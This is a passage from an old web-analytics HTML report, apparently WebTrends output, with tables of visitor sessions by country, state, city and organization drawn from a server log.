<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Finland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Finland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Finland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Finland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Finland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Switzerland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Switzerland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Switzerland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Switzerland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Switzerland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>7839</B></TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopStates"><!--Visitors & Demographics::North American States--></A>
<!-- WT_H1>North American States and Provinces</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>North American States and Provinces</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section breaks down web site activity to show which of the North American States and Provinces were the most active on the site. This information is based on where the domain name of the visitor is registered, and may not always be an accurate representation of the actual geographic location of this visitor. This information can only be displayed if reverse DNS lookups have been performed.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index08.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>3, .3, 3.7, 2</WT_TABLE_STATS -->
<CENTER><B>North American States & Provinces</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>North American States</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>State</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Virginia</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3928</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>California</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">743</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Minnesota</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">297</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Georgia</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">234</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Oregon</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">182</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Illinois</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">67</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Ontario</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">46</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Texas</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">45</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Florida</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">39</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Washington</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">38</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD><FONT SIZE=3 FACE="" COLOR="#000000"><B>Total For the States Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>5619</B></TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopCities"><!--Visitors & Demographics::Most Active Cities--></A>
<!-- WT_H1>Most Active Cities</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Active Cities</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section further breaks down the site's activity to show which cities were the most active on the site. This information is based on where the domain name of the visitor is registered, and may not always be an accurate representation of the actual geographic location of this visitor. This information can only be displayed if reverse DNS lookups have been performed.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index09.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>3, .3, 3.7, 2</WT_TABLE_STATS -->
<CENTER><B>Activity by City</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Active Cities</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>City, State</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Vienna, Virginia, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3786</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Berkeley, California, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">271</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Golden Valley, Minnesota, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">256</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mountain View, California, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">213</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Atlanta, Georgia, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">189</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Medofrd, Oregon, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">175</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Falls Church, Virginia, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">103</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Palo Alto, California, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">97</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Norcross, Georgia, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">40</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>San Francisco, California, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">37</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Cities Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>5167</B></TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopCompanies"><!--Visitors & Demographics::Most Active Organizations--></A>
<!-- WT_H1>Most Active Organizations</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Active Organizations</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the companies or organizations that accessed the site the most often.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index10.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Most Active Organizations</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Active Organizations</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Organizations</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>America Online</B><BR><A href="http://rs.internic.net/cgi-bin/whois?aol.com">aol.com</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6826</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10.83%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3785</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Leni Wilcox Consultant</B><BR><A href="http://rs.internic.net/cgi-bin/whois?home.com">home.com</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2986</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.73%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">256</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mikota Maentz</B><BR><A href="http://rs.internic.net/cgi-bin/whois?rr.com">rr.com</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2194</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.48%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">175</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Bellsouth Network Solutions</B><BR><A href="http://rs.internic.net/cgi-bin/whois?bellsouth.net">bellsouth.net</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2130</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.37%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">123</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Uunet Technologies Inc.</B><BR><A href="http://rs.internic.net/cgi-bin/whois?uu.net">uu.net</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1279</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.02%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">101</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><A href="http://rs.internic.net/cgi-bin/whois?198.139.155.30">198.139.155.30</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1075</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.7%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1075</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mindspring Enterprises Inc.</B><BR><A href="http://rs.internic.net/cgi-bin/whois?mindspring.com">mindspring.com</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">816</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.29%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">50</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><A href="http://rs.internic.net/cgi-bin/whois?fastsearch.net">fastsearch.net</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">754</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.19%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">113</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><A href="http://rs.internic.net/cgi-bin/whois?cambrian.mb.ca">cambrian.mb.ca</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">655</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.03%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><A href="http://rs.internic.net/cgi-bin/whois?nipr.mil">nipr.mil</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">468</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.74%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">31</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD> </TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Subtotal For Companies Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>19183</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>30.43%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5710</B></TD>
</TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Log File</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>63026</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>10898</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopSuffixes"><!--Visitors & Demographics::Organization Breakdown--></A>
<!-- WT_H1>Organization Breakdown</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Organization Breakdown</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section provides a breakdown by types of organizations (.com, .net, .edu, .org, .mil, and .gov.) This information can only be displayed if reverse DNS lookups have been performed.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index11.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Organization Breakdown</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Organization Breakdown</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Organization</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Company</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20642</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">49.1%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5715</TD></TR>
